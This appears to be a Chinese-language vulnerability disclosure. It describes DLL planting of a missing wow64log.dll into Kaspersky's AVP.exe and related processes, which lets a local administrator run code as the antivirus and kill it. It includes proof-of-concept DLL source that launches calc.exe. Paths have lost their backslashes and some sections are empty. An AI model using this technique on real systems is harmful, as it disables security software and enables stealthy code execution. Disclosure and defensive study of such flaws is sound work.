Kaspersky AVP.exe 中的 DLL 注入允许本地管理员在不知道 Kaspersky 密码的情况下杀死或篡改防病毒软件和在高权限中执行命令。

在Kaspersky AVP.exe进程尝试加载缺少的wow64log.dllDLL文件（在System32）。

通过DLL植入恶意文件，本地Windows管理员可以在这个受信任的AVP.exe进程的上下文中实现代码执行并杀死其他进程，从而在无法检测和清除病毒的杀毒软件上实现拒绝服务和以卡巴斯基的身份执行任意命令。

版本

卡巴斯基安全软件

AVP.exe版本

Kaspersky Password Manager Service

卡巴斯基安全软件启动的进程为：

Kaspersky Password Manager Service启动的进程为：

ProCess Monitor

AVP.exe 加载不存在的wow64log.dll,路径为C:windowsSystem32

Avpui.exe同样加载不存在的Wow64log.dll,路径为C:windowsSystem32

kpm.exe同样加载不存在的Wow64log.dll,路径为C:windowsSystem32

wow64log.dll与 WoW64 Windows 机制有关，该机制允许在 64 位 Windows 上运行 32 位程序。该子系统会自动尝试加载它，但是它不存在于任何公共 Windows 版本中。

C:WindowsSystem (Windows95/98/Me)C:WINNTSystem32(WindowsNT/2000)C:WindowsSystem32 (Windows XP,Vista,7,8,10)

如果是64位文件C:WindowsSysWOW64

作为管理员，我们可以构造恶意 wow64log.dll 文件复制到 System32 。

例如：

#include "pch.h"#include <windows.h>#include <tlhelp32.h>#include <stdio.h>#include <iostream>#include <map>



BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call,  LPVOID lpReserved){  STARTUPINFO si = { sizeof(si) };  PROCESS_INFORMATION pi;  CreateProcess(TEXT("C:WindowsSystem32calc.exe"), NULL, NULL, NULL, false, 0, NULL, NULL, &si, &pi);

  switch (ul_reason_for_call)  {  case DLL_PROCESS_ATTACH:    char szFileName[MAX_PATH + 1];    GetModuleFileNameA(NULL, szFileName, MAX_PATH + 1);

    //check if we are injected in an interesting McAfee process    if (strstr(szFileName, "avp") != NULL      //|| strstr(szFileName, "mcshield") != NULL      || strstr(szFileName, "avp.exe") != NULL      ) {      DisableThreadLibraryCalls(hModule);    }    else    {

    }

  case DLL_THREAD_ATTACH:  case DLL_THREAD_DETACH:  case DLL_PROCESS_DETACH:    //log("detach");    break;  }  return TRUE;}